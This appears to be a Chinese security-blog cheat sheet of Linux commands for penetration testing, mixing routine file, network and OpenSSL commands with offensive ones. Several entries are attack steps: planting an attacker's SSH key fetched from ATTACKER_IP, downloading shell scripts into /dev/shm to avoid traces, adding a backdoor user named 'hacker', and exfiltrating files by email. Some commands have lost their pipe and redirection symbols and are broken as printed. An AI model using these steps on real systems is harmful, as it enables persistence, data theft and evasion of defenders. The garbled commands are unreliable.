渗透测试Linux命令(奇技淫巧)
灭迹下的荒诞
- 关注
渗透测试Linux命令(奇技淫巧)

渗透测试Linux命令(奇技淫巧)
整理常见渗透、后门维持、数据提取、服务操作等实用命令并附带技巧说明
数据外传 & 编码
# Base64 编码不换行用于数据隐写绕过检测
base64 -w 0 file
# 十六进制输出无换行适合 payload 编码
xxd -p boot12.bin tr -d '\n'
权限维持 / 后门注入
# 将攻击者公钥加入当前用户 SSH 授权
curl https://ATTACKER_IP/.ssh/id_rsa.pub ~/.ssh/authorized_keys
Echo 技巧
# 不换行输出同时支持转义字符
echo -n -e '\x41' # 输出A
文本统计与处理
wc -l file # 统计行数
wc -c file # 统计字符数
sort -nr # 数值降序排序
cat file sort uniq # 排序 + 去重如去重 IP用户等
替换文件内容
sed -i 's/OLD/NEW/g' path/file # 全局替换字符串
隐蔽下载文件
# 下载文件到内存避免落地留痕
wget http://IP/file.py -O /dev/shm/.rev.py
curl http://IP/shell.py -o /dev/shm/shell.py
网络相关文件分析
lsof -i # 所有网络文件
lsof -i 4 # IPv4 连接
lsof -i 6 # IPv6 连接
lsof -i :80 # 使用 80 端口的进程
lsof -p 1234 # PID 为 1234 的进程打开的文件
lsof +D /lib # 使用某目录下文件的进程
fuser -nv tcp 80 # 查找 TCP 80 被谁占用
解压缩各种格式
tar -xvzf file.tgz # .tgz
tar -xvjf file.tbz # .tbz
bzip2 -d file.bz2 # .bz2
gunzip file.gz # .gz
unzip file.zip # .zip
7z x file.7z # .7z
unxz file.xz # .xz (需先安装 xz-utils)
添加用户
useradd -p $(openssl passwd -1 'password') hacker
复制文件内容至剪贴板
xclip -sel c file.txt
快速搭建 Web 服务器
python -m SimpleHTTPServer 80
python3 -m http.server
php -S 0.0.0.0:80
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port = 80, :DocumentRoot = Dir.pwd).start"
Curl 高级用法
# POST JSON 数据
curl -H "Content-Type: application/json" -X POST \
-d '{"username":"admin","password":"password"}' http://host:3000/api
# 使用 JWT 认证
curl -X GET -H "Authorization: Bearer JWT" http://host:3000/endpoint
邮件发送数据 exfiltration
sendEmail -t to@email.com -f from@email.com -s 192.168.1.1 \
-u "Subject" -a file.pdf
文件处理与分析
# 跳过前28字节复制文件
dd if=file.bin bs=28 skip=1 of=out.bin
# 查看压缩包内容
7z l file.zip
挂载虚拟硬盘 (.vhd)
sudo apt-get install libguestfs-tools
guestmount --add file.vhd --inspector --ro /mnt/vhd
OpenSSL 常用操作
# 获取远程 HTTPS 证书
openssl s_client -connect IP:443
# 读取证书信息
openssl x509 -in cert.pem -text
# 生成密钥 + 证书请求
openssl genrsa -out key.pem 2048
openssl req -new -key key.pem -out request.csr
# 自签证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# 由中间证书签名
openssl x509 -req -in request.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out signed.pem
# 导出为 PKCS12
openssl pkcs12 -export -out user.pfx -inkey key.pem -in cert.pem
# 解密 SSH 私钥
openssl rsa -in key.enc -out key.ssh
# 对称解密文件
openssl enc -aes256 -k secret -d -in file.enc -out file
程序执行指令统计
perf stat -x, -e instructions:u "ls"
按日期查找文件用于找后门
find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f \
-readable -not -path "/proc/*" -not -path "/sys/*" -ls 2/dev/null
系统配置 & 安全防护
# 重设时区
sudo dpkg-reconfigure tzdata
# 查找命令属于哪个包
apt-file search /usr/bin/file # apt-get install apt-file
# 设置不可删除属性
sudo chattr +i file.txt
sudo chattr -i file.txt
解码 Protobuf 数据
echo "CIKUmMesGw==" base64 -d protoc --decode_raw
本文为 灭迹下的荒诞 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
渗透测试macOS命令(温故知新)
2025-03-31
Linux持久化实操
2022-12-12
关于Network Discovery的一些思考
2020-04-21
文章目录